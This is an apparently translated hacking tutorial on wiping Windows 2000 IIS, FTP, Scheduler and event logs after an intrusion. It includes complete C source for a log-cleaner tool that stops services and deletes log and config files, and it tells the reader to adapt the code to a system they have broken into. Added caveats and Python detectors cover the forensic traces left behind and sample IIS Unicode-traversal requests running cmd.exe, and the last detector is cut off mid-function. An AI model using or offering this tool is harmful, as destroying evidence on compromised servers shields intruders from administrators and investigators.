
How to build a Windows 2000 log cleaner


The log files on Windows 2000 normally include the application log, the security log, the system log, the DNS server log, the FTP log, the WWW log and so on; which of them exist depends on the services the server runs.

The general procedure is as follows:

1. Clear the IIS logs.

Do not underestimate the IIS log: it records your whole intrusion in detail, for example the commands you typed into IE during a Unicode intrusion, and the traces left behind by a scan of port 80. A moment's carelessness here can get you noticed by the administrator, and maybe even... heh.

So let's clear it by hand.

1. The default log location is %systemroot%\system32\logfiles\w3svc1, one log file per day by default.

Switch to that directory and run

    del *.*

You probably think you are safe now; run dir to check.

Hm, today's log is still there. Don't panic: it is still there because the w3svc service is still running and holds the current file open. So how do we clear that one?

Method 1: if you can log in over 3389 (Terminal Services), open the file in notepad, Ctrl+A, then Delete.

Method 2: the net command

    C:\>net stop w3svc
    The World Wide Web Publishing Service service is stopping. (this can take a long time, and may not succeed)
    The World Wide Web Publishing Service service was stopped successfully.

Good, w3svc is stopped and we can clear its log: del *.*

Don't forget to start w3svc again:

    C:\>net start w3svc

Caveat: stopping and restarting a service through the service control manager is itself recorded in the System log (Service Control Manager events 7035 and 7036 on Windows 2000/XP/2003), which this step does not touch.

2. Clear the FTP log.

FTP log default location: %systemroot%\system32\logfiles\msftpsvc1, one log per day by default. The method is the same as above (the service is msftpsvc).

3. Clear the Scheduler log.

Scheduler service log default location: %systemroot%\schedlgu.txt. The method is the same as above (the service is schedule, the Task Scheduler).

4. Application log, security log, system log and DNS log default location: %systemroot%\system32\config. The method is the same as above (but see step 5: the .evt files are held open by the Event Log service, which cannot be stopped, so del fails on them).

Note that these three directories may not be at the locations above, because the administrator may have changed them. You can read their locations from the registry.

The application, security, system and DNS server log files are registered under:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog

(each log has its own subkey, Application, Security, System and DNS Server, whose File value holds the path, by default %SystemRoot%\system32\config\AppEvent.Evt, SecEvent.Evt, SysEvent.Evt and DnsEvent.Evt, with %SystemRoot% left unexpanded).

The Scheduler service log is registered under:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

5. I borrowed this part from someone else's article (in fact I just copied it).

OK! Congratulations, the simple logs have now been deleted. Next come the hard ones, the security log and the system log. The service guarding them is Event Log; let's try to stop it!

    D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
    The requested pause or stop is not valid for this service.

KAO, I give up. There is no way around it: it is a critical service. Without a third-party tool there is simply no way to delete the security log and the system log from the command line! So we are stuck with the method that is simple but so slow it feels like a hang: open the Event Viewer under Control Panel > Administrative Tools (98 doesn't have one; now you see the advantage of Win2k). On the Action menu there is an item named "Connect to another computer"; click it (screenshot not reproduced here):

Enter the remote computer's IP, light a cigarette, wait tens of minutes and endure what feels like a hung machine, then open the following (screenshot not reproduced here):

Select the remote computer's Security log and choose Properties from its context menu:

Click the "Clear Log" button in Properties. OK! The security log is cleared! Endure the same pain to clear the system log!

Caveat: clearing the Security log is itself audited. On Windows NT/2000/2003 the freshly emptied log begins with event 517 (source Security, "The audit log was cleared"), which names the account that cleared it; on Vista and later it is event 1102. Clearing the System log has no such dedicated event, but a System log that begins abruptly at an unusual time is the first thing a responder looks at.

6. You have now cleared most of the important logs. What remains is to catch anything that might have been missed.

Do this: del the following files

    %systemroot%\*.log

and under system32:

    logfiles\*.*
    dtclog\*.*
    config\*.evt
    *.log
    *.txt

Two caveats. config\*.evt fails while the Event Log service is running (the files are open), and system32\config also holds the registry hives (SAM, SECURITY, SYSTEM, SOFTWARE, DEFAULT), so never widen this pattern to *.* there. Deleting every *.log and *.txt under %systemroot% and system32 also removes far more than logs (setup and component logs, readme files), and a wholesale disappearance of that kind is exactly what an administrator notices.

So far I've taught you how to clear most of the logs I know of; now put it to use.
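The IIS log paragraph in step 1 says the W3C log captures the commands typed during a Unicode intrusion and the traces of a port-80 scan. The following is an added example, not code from the original article, that parses lines in the W3C extended format IIS 5 writes by default and flags exactly those entries. The sample lines are constructed for the example, and the lax two-byte decoder is an emulation written here of the pre-MS00-078 IIS behaviour in which %c0%af decodes to '/' and %c1%1c to '\', not IIS's own code.

```python
"""Parse IIS W3C extended log lines and flag the requests an administrator
would notice: overlong-UTF-8 ("Unicode") traversal, cmd.exe invocation and
scanning.  Added example, not code from the original article."""
import string
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample in the W3C extended format IIS 5 writes by default; the
# addresses, times and paths are invented for this example.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-03-05 00:00:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-03-05 10:21:03 10.0.0.7 - 10.0.0.2 80 GET /default.htm - 200 Mozilla/4.0
2001-03-05 10:22:41 10.0.0.7 - 10.0.0.2 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200 Mozilla/4.0
2001-03-05 10:22:59 10.0.0.7 - 10.0.0.2 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir+c:\\winnt\\system32\\logfiles\\w3svc1 200 Mozilla/4.0
2001-03-05 10:23:10 10.0.0.9 - 10.0.0.2 80 GET /cgi-bin/test.cgi - 404 Scanner
2001-03-05 10:23:11 10.0.0.9 - 10.0.0.2 80 HEAD /_vti_bin/shtml.dll - 404 Scanner
"""


def _hexbyte(s: str, i: int) -> Optional[int]:
    """Byte value of the %XX escape starting at s[i], or None if there is none."""
    h = s[i + 1:i + 3]
    if s[i] == "%" and len(h) == 2 and all(c in string.hexdigits for c in h):
        return int(h, 16)
    return None


def lax_percent_decode(s: str) -> str:
    """Decode %XX escapes the way IIS 4/5 did before MS00-078 (emulation
    written for this example): a lead byte 0xC0-0xDF is folded with the next
    escaped byte into one character without checking that the second byte is
    a valid UTF-8 continuation byte, so %c0%af -> '/' and %c1%1c -> '\\'."""
    out: List[str] = []
    i = 0
    while i < len(s):
        b = _hexbyte(s, i)
        if b is None:
            out.append(s[i])
            i += 1
            continue
        i += 3
        if 0xC0 <= b <= 0xDF:
            b2 = _hexbyte(s, i) if i < len(s) else None
            if b2 is not None:
                i += 3
                b = ((b & 0x1F) << 6) | (b2 & 0x3F)
        out.append(chr(b))
    return "".join(out)


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """One dict per request, keyed by the names in the latest #Fields: line.
    IIS writes '-' for empty fields and '+' for spaces, so a plain split on
    spaces yields exactly one token per field."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            rows.append(dict(zip(fields, values)))
    return rows


def suspicious_requests(text: str) -> List[Tuple[str, str, str]]:
    """(client ip, decoded stem, reasons) for requests that use overlong
    UTF-8, walk above the URL root after decoding, or invoke cmd.exe."""
    findings = []
    for row in parse_w3c(text):
        raw = row.get("cs-uri-stem", "-")
        stem = lax_percent_decode(raw).replace("\\", "/").lower()
        reasons = []
        if "%c0" in raw.lower() or "%c1" in raw.lower():
            reasons.append("overlong UTF-8 escape")
        depth = 0
        for seg in stem.split("/"):
            if seg == "..":
                depth -= 1
            elif seg and seg != ".":
                depth += 1
            if depth < 0:
                reasons.append("traversal above URL root")
                break
        if stem.endswith("/cmd.exe"):
            reasons.append("cmd.exe invoked")
        if reasons:
            findings.append((row["c-ip"], stem, "; ".join(reasons)))
    return findings


def probable_scanners(text: str, min_404: int = 2) -> List[str]:
    """Clients that collected at least min_404 '404' responses: the footprint
    of the port-80 scan the article mentions."""
    misses = Counter(r["c-ip"] for r in parse_w3c(text) if r.get("sc-status") == "404")
    return sorted(ip for ip, n in misses.items() if n >= min_404)


if __name__ == "__main__":
    for ip, stem, why in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {stem}: {why}")
    print("scanners:", probable_scanners(SAMPLE_LOG))
```

The traversal check is done on the decoded path, which is the point: the raw cs-uri-stem looks like a request under /scripts, and only after the overlong escapes are folded does it read as /scripts/../../winnt/system32/cmd.exe. Feed it the previous days' ex*.log files and every such line is a record the article's del *.* was meant to remove.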

In fact the main purpose of this article is not to teach you how to clear logs but to teach you how to write a log-clearing tool. Treat everything I said above as hot air.

Now to the main subject:

You have seen the whole process of clearing the logs: it is tedious, it takes a good deal of time by hand, and sometimes the logs still cannot be cleared completely. So a programmer will think: I can code, what am I afraid of? Let's get to work.

As you now know, before some logs can be cleared a few services must be stopped first.

So first let me teach you how to write a little DOS tool that lists the services on a machine; for the implementation see my earlier article "How to make a DOS service viewer".

The tool is named serName.exe. Run it:

    serName.exe -t 1 -t 1

Heh, all the services running on the machine are listed. Remember the names of the services you need to stop; you'll need them below.

The second step of the programming is to stop the w3svc, schedule, ftp and other services. My code is below; read it alongside MSDN (it is not hard, and don't come asking me about what you don't understand).

The snippets below assume #include <windows.h> and <stdio.h>, an ANSI build (TCHAR is char, so printf("%s") on an LPCTSTR is correct) and linking with advapi32.lib for the service control manager APIs.

    void StopServices(LPCTSTR lpServiceName)
    {
        // SC_MANAGER_CONNECT is the minimum right needed to open individual services;
        // the original asked for SC_MANAGER_ENUMERATE_SERVICE, which is kept here.
        SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
        if (scman)
        {
            SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
            if (sh)
            {
                SERVICE_STATUS ServiceStatus;
                // Asks the service to stop; it may still be SERVICE_STOP_PENDING on return.
                BOOL bControl = ::ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus);
                if (bControl)
                {
                    printf("success to stop the service \"%s\"\n", lpServiceName);
                }
                else
                {
                    DWORD dwControl = ::GetLastError();
                    switch (dwControl) {
                    case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with the necessary access.\n"); break;
                    case ERROR_SERVICE_NOT_ACTIVE: printf("The service has not been started.\n"); break;
                    case ERROR_DEPENDENT_SERVICES_RUNNING: printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
                    case ERROR_INVALID_SERVICE_CONTROL: printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
                    case ERROR_SERVICE_CANNOT_ACCEPT_CTRL: printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
                    case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                    default: printf("ControlService failed, error %lu\n", dwControl); break;
                    }
                }
                ::CloseServiceHandle(sh);
            }
            ::CloseServiceHandle(scman);
        }
    }

Now that we have the function, let's write a main function to try it:

    int main()
    {
        StopServices("W3SVC");
        return 0;
    }

OK, it worked; if it did not, go by the error message printed.

Good, we have a function that can stop a service. Next we need one that can start a service. If you understood the above, the code below is only a small variation on it.

    void StartServices(LPCTSTR lpServiceName)
    {
        SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
        if (scman)
        {
            SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
            if (sh)
            {
                // No arguments are passed (the original passed the service name as
                // argv[0], which is harmless but unnecessary).
                BOOL bControl = ::StartService(sh, 0, NULL);
                if (bControl)
                {
                    printf("success to start the service \"%s\"\n", lpServiceName);
                }
                else
                {
                    DWORD dwControl = ::GetLastError();
                    switch (dwControl) {
                    case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_START access.\n"); break;
                    case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                    case ERROR_PATH_NOT_FOUND: printf("The service binary file could not be found.\n"); break;
                    case ERROR_SERVICE_ALREADY_RUNNING: printf("An instance of the service is already running.\n"); break;
                    case ERROR_SERVICE_DATABASE_LOCKED: printf("The database is locked.\n"); break;
                    case ERROR_SERVICE_DEPENDENCY_DELETED: printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
                    case ERROR_SERVICE_DEPENDENCY_FAIL: printf("The service depends on another service that has failed to start.\n"); break;
                    case ERROR_SERVICE_DISABLED: printf("The service has been disabled.\n"); break;
                    case ERROR_SERVICE_LOGON_FAILED: printf("The service could not be logged on.\n"); break;
                    case ERROR_SERVICE_MARKED_FOR_DELETE: printf("The service has been marked for deletion.\n"); break;
                    case ERROR_SERVICE_NO_THREAD: printf("A thread could not be created for the service.\n"); break;
                    case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                    default: printf("StartService failed, error %lu\n", dwControl); break;
                    }
                }
                ::CloseServiceHandle(sh);
            }
            ::CloseServiceHandle(scman);
        }
    }

Heh, just a few small changes.

Now that you have these two weapons, the rest is to apply the knowledge from the first part and del the files; I don't think I need to teach you that, you have surely already worked out how.

Now for the third weapon. It is optional for our program, but essential for a well-behaved one: a function that checks the state of a service.

My code is as follows.

    DWORD GetServicesState(LPCTSTR lpServiceName)
    {
        DWORD dwState = 0;      // 0 is not a valid SERVICE_* state, so it doubles as "unknown"
        SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
        if (scman)
        {
            SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
            if (sh)
            {
                SERVICE_STATUS ServiceStatus;
                BOOL bQuery = ::QueryServiceStatus(sh, &ServiceStatus);
                if (!bQuery)
                {
                    DWORD dwControl = ::GetLastError();
                    switch (dwControl) {
                    case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                    case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                    default: printf("QueryServiceStatus failed, error %lu\n", dwControl); break;
                    }
                }
                else
                {
                    // SERVICE_RUNNING, SERVICE_STOPPED, SERVICE_STOP_PENDING, ...
                    dwState = ServiceStatus.dwCurrentState;
                }
                ::CloseServiceHandle(sh);
            }
            ::CloseServiceHandle(scman);
        }
        return dwState;
    }

Good, now we have everything; let's finish the code.

The rest of the code follows. I hope you adjust the source to the specifics of the system you have broken into before you run it.

    //==========================================================//
    //              綠兵日志Cleaner1.0                           //
    //    Compiled by http://www.vertarmy.com 綠色兵團           //
    //    http://vcghost.yeah.net 編の魂(tryibest)              //
    //    [email protected]                                   //
    //                                                        //
    //==========================================================//
    // Build notes: ANSI build assumed (TCHAR == char), so printf("%s") on an
    // LPCTSTR is correct; link with advapi32.lib for the service APIs.
    #include <windows.h>
    #include <stdio.h>

    void StopServices(LPCTSTR lpServiceName);
    void StartServices(LPCTSTR lpServiceName);
    DWORD GetServicesState(LPCTSTR lpServiceName);
    void DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory);
    void Del3WFile();
    void DelFtpFile();
    void DelSheduleFile();
    void DelOtherFile();
    void ShowTitle();

    int main()
    {
        ShowTitle();
        DelOtherFile();
        Del3WFile();
        DelFtpFile();
        DelSheduleFile();
        ShowTitle();
        return 0;
    }

    void StopServices(LPCTSTR lpServiceName)
    {
        // SC_MANAGER_CONNECT is the minimum right needed to open individual services;
        // the original asked for SC_MANAGER_ENUMERATE_SERVICE, which is kept here.
        SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
        if (scman)
        {
            SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
            if (sh)
            {
                SERVICE_STATUS ServiceStatus;
                // Asks the service to stop; it may still be SERVICE_STOP_PENDING on return.
                BOOL bControl = ::ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus);
                if (bControl)
                {
                    printf("success to stop the service \"%s\"\n", lpServiceName);
                }
                else
                {
                    DWORD dwControl = ::GetLastError();
                    switch (dwControl) {
                    case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with the necessary access.\n"); break;
                    case ERROR_SERVICE_NOT_ACTIVE: printf("The service has not been started.\n"); break;
                    case ERROR_DEPENDENT_SERVICES_RUNNING: printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
                    case ERROR_INVALID_SERVICE_CONTROL: printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
                    case ERROR_SERVICE_CANNOT_ACCEPT_CTRL: printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
                    case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                    default: printf("ControlService failed, error %lu\n", dwControl); break;
                    }
                }
                ::CloseServiceHandle(sh);
            }
            ::CloseServiceHandle(scman);
        }
    }

    void StartServices(LPCTSTR lpServiceName)
    {
        SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
        if (scman)
        {
            SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
            if (sh)
            {
                // No arguments are passed (the original passed the service name as
                // argv[0], which is harmless but unnecessary).
                BOOL bControl = ::StartService(sh, 0, NULL);
                if (bControl)
                {
                    printf("success to start the service \"%s\"\n", lpServiceName);
                }
                else
                {
                    DWORD dwControl = ::GetLastError();
                    switch (dwControl) {
                    case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_START access.\n"); break;
                    case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                    case ERROR_PATH_NOT_FOUND: printf("The service binary file could not be found.\n"); break;
                    case ERROR_SERVICE_ALREADY_RUNNING: printf("An instance of the service is already running.\n"); break;
                    case ERROR_SERVICE_DATABASE_LOCKED: printf("The database is locked.\n"); break;
                    case ERROR_SERVICE_DEPENDENCY_DELETED: printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
                    case ERROR_SERVICE_DEPENDENCY_FAIL: printf("The service depends on another service that has failed to start.\n"); break;
                    case ERROR_SERVICE_DISABLED: printf("The service has been disabled.\n"); break;
                    case ERROR_SERVICE_LOGON_FAILED: printf("The service could not be logged on.\n"); break;
                    case ERROR_SERVICE_MARKED_FOR_DELETE: printf("The service has been marked for deletion.\n"); break;
                    case ERROR_SERVICE_NO_THREAD: printf("A thread could not be created for the service.\n"); break;
                    case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                    default: printf("StartService failed, error %lu\n", dwControl); break;
                    }
                }
                ::CloseServiceHandle(sh);
            }
            ::CloseServiceHandle(scman);
        }
    }

    DWORD GetServicesState(LPCTSTR lpServiceName)
    {
        DWORD dwState = 0;      // 0 is not a valid SERVICE_* state, so it doubles as "unknown"
        SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
        if (scman)
        {
            SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
            if (sh)
            {
                SERVICE_STATUS ServiceStatus;
                BOOL bQuery = ::QueryServiceStatus(sh, &ServiceStatus);
                if (!bQuery)
                {
                    DWORD dwControl = ::GetLastError();
                    switch (dwControl) {
                    case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                    case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                    default: printf("QueryServiceStatus failed, error %lu\n", dwControl); break;
                    }
                }
                else
                {
                    dwState = ServiceStatus.dwCurrentState;
                }
                ::CloseServiceHandle(sh);
            }
            ::CloseServiceHandle(scman);
        }
        return dwState;
    }

    // Deletes every file matching the pattern lpFileName (e.g. C:\WINNT\system32\logfiles\w3svc1\*.log).
    // lpDirectory is the same directory and must end with a backslash, because
    // FindFirstFile only returns bare file names.
    void DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory)
    {
        TCHAR tcFileName[1024];
        WIN32_FIND_DATA FindFileData;
        HANDLE hFile = ::FindFirstFile(lpFileName, &FindFileData);
        if (hFile == INVALID_HANDLE_VALUE)
            return;     // nothing matched, or the directory does not exist
        do
        {
            // Skip ".", ".." and subdirectories: DeleteFile fails on them anyway.
            if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                continue;
            lstrcpy(tcFileName, lpDirectory);
            lstrcat(tcFileName, FindFileData.cFileName);
            if (::DeleteFile(tcFileName))
                printf("delete file \"%s\" success\n", tcFileName);
            else
                // Typically ERROR_SHARING_VIOLATION: the service still holds the file open.
                printf("delete file \"%s\" fail (error %lu)\n", tcFileName, ::GetLastError());
        } while (::FindNextFile(hFile, &FindFileData));
        ::FindClose(hFile);
    }

    // Stops the service if it is running, deletes the files, then restarts it.
    // The Sleep(1000) calls are crude: ControlService returns while the service is
    // still SERVICE_STOP_PENDING, so a robust version polls GetServicesState()
    // until it reports SERVICE_STOPPED (the original noted "should consider a thread").
    static void StopDeleteRestart(LPCTSTR lpServiceName, LPCTSTR lpFilePattern, LPCTSTR lpDirectory)
    {
        BOOL bWasRunning = (GetServicesState(lpServiceName) == SERVICE_RUNNING);
        if (bWasRunning)
        {
            StopServices(lpServiceName);
            ::Sleep(1000);
        }
        DelFiles(lpFilePattern, lpDirectory);
        if (bWasRunning)
        {
            ::Sleep(1000);
            StartServices(lpServiceName);
        }
    }

    void Del3WFile()
    {
        TCHAR tcSystemDirectory[1024];
        ::GetSystemDirectory(tcSystemDirectory, 1024);   // e.g. C:\WINNT\system32, no trailing backslash
        TCHAR tc3WDirectory[1024];
        TCHAR tc3WFile[1024];
        lstrcpy(tc3WDirectory, tcSystemDirectory);
        lstrcpy(tc3WFile, tcSystemDirectory);
        lstrcat(tc3WFile, "\\logfiles\\w3svc1\\*.log");
        lstrcat(tc3WDirectory, "\\logfiles\\w3svc1\\");
        StopDeleteRestart("w3svc", tc3WFile, tc3WDirectory);
    }

    void DelFtpFile()
    {
        TCHAR tcSystemDirectory[1024];
        ::GetSystemDirectory(tcSystemDirectory, 1024);
        TCHAR tcFtpDirectory[1024];
        TCHAR tcFtpFile[1024];
        lstrcpy(tcFtpDirectory, tcSystemDirectory);
        lstrcpy(tcFtpFile, tcSystemDirectory);
        lstrcat(tcFtpFile, "\\logfiles\\msftpsvc1\\*.log");
        lstrcat(tcFtpDirectory, "\\logfiles\\msftpsvc1\\");
        StopDeleteRestart("msftpsvc", tcFtpFile, tcFtpDirectory);
    }

    // Cuts the last path component off in place, turning C:\WINNT\system32 into
    // C:\WINNT (the same result GetWindowsDirectory() returns directly).
    static void StripLastComponent(TCHAR *tcPath)
    {
        int iLength = lstrlen(tcPath);
        while (--iLength > 0)
        {
            if (tcPath[iLength] == '\\')
                break;
        }
        tcPath[iLength] = '\0';
    }

    void DelSheduleFile()
    {
        TCHAR tcSystemDirectory[1024];
        ::GetSystemDirectory(tcSystemDirectory, 1024);
        TCHAR tcScheduleFile[1024];
        lstrcpy(tcScheduleFile, tcSystemDirectory);
        StripLastComponent(tcScheduleFile);                 // %SystemRoot%
        lstrcat(tcScheduleFile, "\\SchedLgU.txt");
        BOOL bWasRunning = (GetServicesState("schedule") == SERVICE_RUNNING);
        if (bWasRunning)
        {
            StopServices("schedule");
            ::Sleep(1000);
        }
        if (::DeleteFile(tcScheduleFile))
            printf("delete file \"%s\" success\n", tcScheduleFile);
        else
            printf("delete file \"%s\" fail (error %lu)\n", tcScheduleFile, ::GetLastError());
        if (bWasRunning)
        {
            ::Sleep(1000);
            StartServices("schedule");
        }
    }

    void DelOtherFile()
    {
        TCHAR tcSystemDirectory[1024];
        ::GetSystemDirectory(tcSystemDirectory, 1024);
        TCHAR tcOtherFile[1024];
        TCHAR tcOtherDirectory[1024];

        // delete every file under logfiles
        lstrcpy(tcOtherFile, tcSystemDirectory);
        lstrcpy(tcOtherDirectory, tcSystemDirectory);
        lstrcat(tcOtherFile, "\\logfiles\\*.*");
        lstrcat(tcOtherDirectory, "\\logfiles\\");
        DelFiles(tcOtherFile, tcOtherDirectory);

        // delete every file under dtclog
        lstrcpy(tcOtherFile, tcSystemDirectory);
        lstrcpy(tcOtherDirectory, tcSystemDirectory);
        lstrcat(tcOtherFile, "\\dtclog\\*.*");
        lstrcat(tcOtherDirectory, "\\dtclog\\");
        DelFiles(tcOtherFile, tcOtherDirectory);

        // delete every file under config
        // Caution: besides the .evt files (held open by the Event Log service, so
        // DeleteFile fails on them) this directory holds the registry hives
        // (SAM, SECURITY, SYSTEM, SOFTWARE, DEFAULT). They are locked while Windows
        // runs, but *.evt (as in step 6 of part one) is the safer pattern.
        lstrcpy(tcOtherFile, tcSystemDirectory);
        lstrcpy(tcOtherDirectory, tcSystemDirectory);
        lstrcat(tcOtherFile, "\\config\\*.*");
        lstrcat(tcOtherDirectory, "\\config\\");
        DelFiles(tcOtherFile, tcOtherDirectory);

        // delete every .log file under system32
        lstrcpy(tcOtherFile, tcSystemDirectory);
        lstrcpy(tcOtherDirectory, tcSystemDirectory);
        lstrcat(tcOtherFile, "\\*.log");
        lstrcat(tcOtherDirectory, "\\");
        DelFiles(tcOtherFile, tcOtherDirectory);

        // delete every .txt file under system32
        lstrcpy(tcOtherFile, tcSystemDirectory);
        lstrcpy(tcOtherDirectory, tcSystemDirectory);
        lstrcat(tcOtherFile, "\\*.txt");
        lstrcat(tcOtherDirectory, "\\");
        DelFiles(tcOtherFile, tcOtherDirectory);

        // get the winnt directory path
        TCHAR tcWinDirectory[1024];
        lstrcpy(tcWinDirectory, tcSystemDirectory);
        StripLastComponent(tcWinDirectory);

        // delete winnt\*.log
        lstrcpy(tcOtherFile, tcWinDirectory);
        lstrcpy(tcOtherDirectory, tcWinDirectory);
        lstrcat(tcOtherFile, "\\*.log");
        lstrcat(tcOtherDirectory, "\\");
        DelFiles(tcOtherFile, tcOtherDirectory);

        // delete winnt\*.txt
        lstrcpy(tcOtherFile, tcWinDirectory);
        lstrcpy(tcOtherDirectory, tcWinDirectory);
        lstrcat(tcOtherFile, "\\*.txt");
        lstrcat(tcOtherDirectory, "\\");
        DelFiles(tcOtherFile, tcOtherDirectory);
    }

    void ShowTitle()
    {
        printf("===========================================================\n");
        printf("$              綠兵日志Cleaner1.0                          $\n");
        printf("$    Compiled by http://www.vertarmy.com 綠色兵團          $\n");
        printf("$    http://vcghost.yeah.net 編の魂(tryibest)             $\n");
        printf("$    [email protected]                                  $\n");
        printf("===========================================================\n");
    }
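The tool above stops and restarts w3svc, msftpsvc and schedule through the service control manager, and part one clears the Security log through Event Viewer. Both leave records in logs this procedure never removes: on Windows 2000/XP/2003 the Service Control Manager writes events 7035 and 7036 to the System log for every stop, and clearing the Security log writes event 517 (1102 from Vista on) as the first entry of the emptied log, naming the account that cleared it. The following added example, not part of the original article, runs that check over constructed event records; the record layout (log, time, source, id, user, desc) is this example's own assumption, chosen to mirror Event Viewer's columns plus the description text.

```python
"""Find the traces the log-clearing procedure leaves in the logs it cannot
delete.  Added example, not code from the original article."""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Windows 2000/XP/2003 event IDs (1102 added for Vista and later):
#   Security 517  "The audit log was cleared."
#   System   7035 "The <service> service was successfully sent a stop control."
#   System   7036 "The <service> service entered the stopped state."
AUDIT_CLEARED_IDS = {517, 1102}
SCM_CONTROL_IDS = {7035, 7036}
# Display names of the three services the cleaner stops.
LOG_SERVICES = ("World Wide Web Publishing Service",
                "FTP Publishing Service",
                "Task Scheduler")

# Constructed sample records (the layout is this example's own). They imitate
# what WEB01 would hold after the cleaner ran and the Security log was then
# cleared through Event Viewer.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"log": "System", "time": "2001-03-05 09:00:10", "source": "Service Control Manager", "id": "7036",
     "user": "N/A", "desc": "The Print Spooler service entered the running state."},
    {"log": "System", "time": "2001-03-05 10:40:02", "source": "Service Control Manager", "id": "7035",
     "user": "WEB01\\Administrator", "desc": "The World Wide Web Publishing Service service was successfully sent a stop control."},
    {"log": "System", "time": "2001-03-05 10:40:03", "source": "Service Control Manager", "id": "7036",
     "user": "N/A", "desc": "The World Wide Web Publishing Service service entered the stopped state."},
    {"log": "System", "time": "2001-03-05 10:40:05", "source": "Service Control Manager", "id": "7036",
     "user": "N/A", "desc": "The World Wide Web Publishing Service service entered the running state."},
    {"log": "System", "time": "2001-03-05 10:40:05", "source": "Service Control Manager", "id": "7035",
     "user": "WEB01\\Administrator", "desc": "The FTP Publishing Service service was successfully sent a stop control."},
    {"log": "System", "time": "2001-03-05 10:40:06", "source": "Service Control Manager", "id": "7036",
     "user": "N/A", "desc": "The FTP Publishing Service service entered the stopped state."},
    {"log": "System", "time": "2001-03-05 10:40:08", "source": "Service Control Manager", "id": "7035",
     "user": "WEB01\\Administrator", "desc": "The Task Scheduler service was successfully sent a stop control."},
    {"log": "System", "time": "2001-03-05 10:40:09", "source": "Service Control Manager", "id": "7036",
     "user": "N/A", "desc": "The Task Scheduler service entered the stopped state."},
    {"log": "Security", "time": "2001-03-05 10:52:30", "source": "Security", "id": "517",
     "user": "WEB01\\Administrator", "desc": "The audit log was cleared."},
]


def _t(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def audit_log_cleared(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(time, account) for every 'audit log was cleared' record. The first
    entry of an emptied Security log is always this event, so whoever clears
    the log documents the clearing."""
    return [(e["time"], e["user"]) for e in events
            if e["log"] == "Security" and int(e["id"]) in AUDIT_CLEARED_IDS]


def log_service_stops(events: List[Dict[str, str]]) -> List[Tuple[datetime, str]]:
    """(time, service) for each SCM record of a log-producing service being
    stopped. 7036 is also written for 'entered the running state', so the
    description is checked for 'stop'."""
    stops = []
    for e in events:
        if e["log"] != "System" or int(e["id"]) not in SCM_CONTROL_IDS:
            continue
        if "stop" not in e["desc"]:
            continue
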